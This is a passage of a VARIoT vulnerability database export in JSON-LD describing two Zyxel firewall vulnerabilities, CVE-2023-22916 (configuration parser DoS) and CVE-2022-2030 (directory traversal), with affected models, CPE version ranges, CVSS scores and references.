                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          }
        ]
      },
      "cve": "CVE-2023-22916",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "impactScore": 5.2,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.1,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2023-22916",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-22916",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2023-22916",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202304-1908",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The configuration parser of Zyxel ATP series firmware versions 5.10 through 5.35, USG FLEX series firmware versions 5.00 through 5.35, USG FLEX 50(W) firmware versions 5.10 through 5.35, USG20(W)-VPN firmware versions 5.10 through 5.35, and VPN series firmware versions 5.00 through 5.35, which fails to properly sanitize user input. A remote unauthenticated attacker could leverage the vulnerability to modify device configuration data, resulting in DoS conditions on an affected device if the attacker could trick an authorized administrator to switch the management mode to the cloud mode. usg flex 100 firmware, usg flex 100w firmware, USG FLEX 200 firmware etc. ZyXEL There are unspecified vulnerabilities in the product.Information is tampered with and service operation is interrupted (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-22916"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-22916",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1908",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-22916",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22916"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ]
      },
      "id": "VAR-202304-1913",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3125
      },
      "last_update_date": "2023-12-18T12:14:48.086000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel ATP Security vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=236008"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          },
          {
            "problemtype": "Lack of information (CWE-noinfo) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-of-firewalls-and-aps"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-22916"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2023-22916/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22916"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22916"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-22916"
          },
          {
            "date": "2023-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "date": "2023-04-24T17:15:09.767000",
            "db": "NVD",
            "id": "CVE-2023-22916"
          },
          {
            "date": "2023-04-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-22916"
          },
          {
            "date": "2023-12-05T05:26:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "date": "2023-05-04T19:35:46.887000",
            "db": "NVD",
            "id": "CVE-2023-22916"
          },
          {
            "date": "2023-05-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Product vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1908"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202207-1385

    Vulnerability from variot - Updated: 2023-12-18 11:55

    A directory traversal vulnerability caused by specific character sequences within an improperly sanitized URL was identified in some CGI programs of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.11 through 4.72, that could allow an authenticated attacker to access some restricted files on a vulnerable device. usg flex 100w firmware, USG FLEX 200 firmware, USG FLEX 500 firmware etc. ZyXEL The product contains a path traversal vulnerability.Information may be obtained

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202207-1385",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "zywall 1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 50w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "zywall 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "zywall 1100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg20-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg40",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "zywall 310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg40w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "zywall 110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg60",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "zywall 110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg60w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn300",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 2200-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "zywall 110",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20w-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn1000",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 310",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
